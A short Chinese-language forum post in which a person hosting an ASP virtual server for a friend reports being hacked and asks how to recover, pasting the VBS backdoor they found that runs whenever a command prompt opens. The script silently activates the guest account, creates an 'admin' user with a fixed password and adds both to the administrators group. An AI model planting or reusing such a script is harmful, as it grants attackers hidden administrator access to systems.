|
给朋友做了虚拟主机,开了ASP,被黑,估计是埋下了啥东西,IP是219.138.224.192,现在进MS-DOS方式会先运行一个VBS,我把它删除了,是个开权限的东西,直接运行CMD.EXE文件也是这样,但CMD.exe文件没有啥变化。
怎么恢复呢?
那个vbs的内容是
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 125699",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net1 user admin /active:yes",0
wsh.run "net1 user admin 125699 /add",0
wsh.run "net1 localgroup administrators admin /add",0
好狠吖 |
|